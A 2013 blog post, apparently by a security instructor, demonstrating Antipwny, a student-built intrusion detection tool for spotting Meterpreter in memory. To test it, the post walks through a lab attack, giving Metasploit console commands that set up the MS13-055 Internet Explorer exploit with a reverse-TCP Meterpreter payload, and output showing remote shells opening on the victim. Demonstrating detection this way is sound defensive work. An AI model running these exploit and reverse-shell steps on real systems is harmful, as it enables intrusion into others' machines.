Antipwny, by Rohan Vazarkar and David Bitner
In Summer and Fall of 2013, my students Rohan Vazarkar and David Bitner began the development of Antipwny, a host based intrusion detection system customized to detect Meterpreter payloads and other Metasploit artifacts.
The latest version of the tool is available on GitHub. It is written in C#, and requires a full .NET Framework 4.5 installation.
Right now (November 2013), it is functional, but incomplete. It happily detect Meterpreter and Metasploit in running memory, and comes complete with a GUI, though the GUI is not complete.
To see the tool in action, let’s target a Windows 7 SP1 x64 system. Grab a copy of Antipwny from GitHub, and grab your .NET installer. The installation of .NET is standard. Once that is done, simply uncompress the Antipwny archive in a convenient directory and run the tool located in the exe subdirectory; separate versions exist for 32 and 64 bit architectures. Once it is run, you obtain a simple GUI:
The program runs in the background, periodically scanning memory for evidence of Meterpreter or Metasploit.
Speaking of which, we need to start thinking about an attack. For the exploit, we’ll use the MS13_055 CAnchor attack against Internet Explorer. This a relatively recent Metasploit module (it dates to September 2013) which I have found to be quite reliable. Let’s get things started in Kali:
=[ metasploit v4.8.0-2013111301 [core:4.8 api:1.0]
+ -- --=[ 1218 exploits - 664 auxiliary - 189 post
+ -- --=[ 322 payloads - 30 encoders - 8 nops
msf > use exploit/windows/browser/ms13_055_canchor
msf exploit(ms13_055_canchor) > set srvport 80
srvport => 80
msf exploit(ms13_055_canchor) > set uripath /
uripath => /
msf exploit(ms13_055_canchor) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms13_055_canchor) > set lhost 10.0.2.129
lhost => 10.0.2.129
msf exploit(ms13_055_canchor) > exploit
[*] Exploit running as background job.
msf exploit(ms13_055_canchor) >
[*] Started reverse handler on 10.0.2.129:4444
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://10.0.2.129:80/
[*] Server started.
Go ahead and visit the problematic web page with Internet Explorer. In Kali, we see the result of the exploit
[*] 10.0.2.132 ms13_055_canchor - Using JRE ROP [*] 10.0.2.132 ms13_055_canchor - Sending exploit... [*] Sending stage (768512 bytes) to 10.0.2.132 [*] Meterpreter session 1 opened (10.0.2.129:4444 -> 10.0.2.132:49161) at 2013-11-17 19:54:38 -0500 [*] Session ID 1 (10.0.2.129:4444 -> 10.0.2.132:49161) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (1036) [*] Spawning notepad.exe process to migrate to [+] Migrating to 604 [*] 10.0.2.132 ms13_055_canchor - Using JRE ROP [*] 10.0.2.132 ms13_055_canchor - Sending exploit... [*] Sending stage (768512 bytes) to 10.0.2.132 [+] Successfully migrated to process [*] Meterpreter session 2 opened (10.0.2.129:4444 -> 10.0.2.132:49163) at 2013-11-17 19:54:45 -0500 [*] Session ID 2 (10.0.2.129:4444 -> 10.0.2.132:49163) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (1876) [*] Spawning notepad.exe process to migrate to [+] Migrating to 2788 [+] Successfully migrated to process msf exploit(ms13_055_canchor) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer : WIN7SP1 OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x64 (Current Process is WOW64) System Language : en_US Meterpreter : x86/win32 meterpreter >
Interestingly, when Internet Explorer realized that it could not load the web page when it first visited the Kali system, it happily reloaded the web page- so we ended up with two shells instead of one. Woot!
Back on the Windows system though, Antipwny almost immediately notes a problem with a pop-up in the system tray:
Then, when the scan is complete (which runs every minute, though it can be run more often via the Rescan button) you end up with information about the attack:
We see that Anipwny has detected both shells.
If you right-click on each of the noted Meterpreter sessions, you have the option to kill the process. If you do so, the attacker on Kali discovers
meterpreter > [*] 10.0.2.132 - Meterpreter session 2 closed. Reason: Died [*] 10.0.2.132 - Meterpreter session 1 closed. Reason: Died
Nice!
You can see a much more extensive demonstration of their tool from their conference presentation at B-Sides Delaware in November 2013:
Leave a comment
Darknet
- Best EDR Of The Market (BEOTM) – Endpoint Detection and Response Testing Tool
- AgentSmith HIDS – Host Based Intrusion Detection
- padre – Padding Oracle Attack Exploiter Tool
- Privacy Implications of Web 3.0 and Darknets
- DataSurgeon – Extract Sensitive Information (PII) From Logs
- Pwnagotchi – Maximize Crackable WPA Key Material For Bettercap
- HardCIDR – Network CIDR and Range Discovery Tool
- Socialscan – Command-Line Tool To Check For Email And Social Media Username Usage
- CFRipper – CloudFormation Security Scanning & Audit Tool
- CredNinja – Test Credential Validity of Dumped Credentials or Hashes
Windows Security
- An error has occurred; the feed is probably down. Try again later.
Security Focus Vulnerabilities
- An error has occurred; the feed is probably down. Try again later.
Security Bloggers Network
- An error has occurred; the feed is probably down. Try again later.
Krebs on Security
- Patch Tuesday, May 2024 Edition
- How Did Authorities Identify the Alleged Lockbit Boss?
- U.S. Charges Russian Man as Boss of LockBit Ransomware Group
- Why Your VPN May Not Be As Secure As It Claims
- Man Who Mass-Extorted Psychotherapy Patients Gets Six Years
- FCC Fines Major U.S. Wireless Carriers for Selling Customer Location Data
- Russian FSB Counterintelligence Chief Gets 9 Years in Cybercrime Bribery Scheme
- Who Stole 3.6M Tax Records from South Carolina?
- Crickets from Chirp Systems in Smart Lock Key Leak
- Why CISA is Warning CISOs About a Breach at Sisense
CyberOperations 
just to let you know that the x86 exe gives a error – The application was unable to start correctly (0x000007b) click ok to close application